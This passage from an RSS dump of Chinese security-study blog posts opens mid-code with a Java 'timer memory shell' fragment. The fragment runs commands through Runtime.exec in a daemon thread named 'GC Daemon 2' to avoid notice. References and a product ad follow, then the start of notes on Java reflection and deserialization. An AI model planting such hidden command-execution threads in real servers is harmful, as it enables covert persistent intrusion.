style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">));</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runtime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getRuntime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">list</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">1</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">).</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">toString</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">());</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Exception</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                </span>e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">printStackTrace</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// while true + sleep ，相当于 Timer 定时任务</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Thread</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">sleep</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">100</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Exception</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> ignored</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 给线程起名叫 GC Daemon 2，没人会注意吧~</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">},</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"GC Daemon 2"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 设为守护线程</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>d</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setDaemon</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">true</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>d</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">start</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:参考引用;"><span style="font-family:宋体;">参考引用</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:参考引用;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.yuque.com/tianxiadamutou" target="_blank">https://www.yuque.com/tianxiadamutou</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:参考引用;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://pdai.tech/" target="_blank">https://pdai.tech/</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:参考引用;"><span style="font-family:Cambria;">代码审计知识星球</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:参考引用;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://xz.aliyun.com/t/11593" target="_blank">https://xz.aliyun.com/t/11593</a></span></span></span></p><p style="margin-top: 9pt;margin-bottom: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:参考引用;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://su18.org/post/memory-shell-2/" target="_blank">https://su18.org/post/memory-shell-2/</a></span></span></span></p><p><mpcps class="js_editor_new_cps" data-templateid="card" data-traceid="e1219075-81f8-4cc7-a2a3-0dad615ece10" data-goodssouce="1" data-pid="100_312729703450" data-appuin="3529291389" data-buffer="{"category_id":136,"pid":"100_312729703450","biz_uin":"3529291389","trace_id":"e1219075-81f8-4cc7-a2a3-0dad615ece10","sku_id":"100_312729703450","source_id":3,"source_name":"拼多多","audit_state":1,"main_img":"https://pcm-img.zhls.qq.com/productcenter-de2a8909--1018825-3878978154223397622/05606261913082022/afe9777b9b62708ee3d48220bc156a49.jpg","product_name":"朴教授澳威雅育发洗发露控油强发根洗发液国药老牌生发正品防脱发","current_price":3080,"first_category_id":"136","discount":"2800","product_label_name_list":["包邮"],"select_tag_name_list":[],"templateId":"card","appuin":"3529291389","isNewCpsKOL":1}"></mpcps></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>



<p><a href="2247483903">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6a220c20&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483903%26idx%3D1%26sn%3D58755740560bba6ccd66f9f3c245953d">跳转微信打开</a></p>

</article>
<article>
<h1>[下班充电计划]java安全漫游学习笔记</h1>
<p>Wed, 05 Jul 2023 23:58:00 +0800</p>
<p>
<span>鲁平</span> <span>2023-07-05 23:58</span> <span style="display: inline-block;">北京</span>
</p>

<p></p>



<p>

</p>


<p><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Calibri;">java反序列化笔记</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">获取类的⽅法： forName</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">实例化类对象的⽅法： newInstance</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">获取函数的⽅法： getMethod</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">执⾏函数的⽅法： invoke</span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">obj.getClass() 如果上下⽂中存在某个类的实例 obj ，那么我们可以直接通过            obj.getClass() 来获取它的类</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">Test.class 如果你已经加载了某个类，只是想获取到它的 java.lang.Class 对象，那么就直接            拿它的 class 属性即可。这个⽅法其实不属于反射。</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">Class.forName 如果你知道某个类的名字，想获取到这个类，就可以使⽤ forName 来获取</span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;font-weight:bold;">⾸先调⽤的是 static {} ，其次是 {} ，最后是构造函数。</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            其中， static {} 就是在“类初始化”的时候调⽤的，⽽ {} 中的代码会放在构造函数的 super() 后⾯，            但在当前构造函数内容的前⾯。            所以说， forName 中的 initialize=true 其实就是告诉Java虚拟机是否执⾏”类初始化“。</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">我们经常在一些源码里看到，类名的部分包含 $ 符号，比如fastjson在 checkAutoType 时候就会            先将 $ 替换成 . ：</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://github.com/alibaba/fastjson/blob/fcc9c2a/src/main/java/com/alibaba/fa" target="_blank">https://github.com/alibaba/fastjson/blob/fcc9c2a/src/main/java/com/alibaba/fa</a></span></span><span 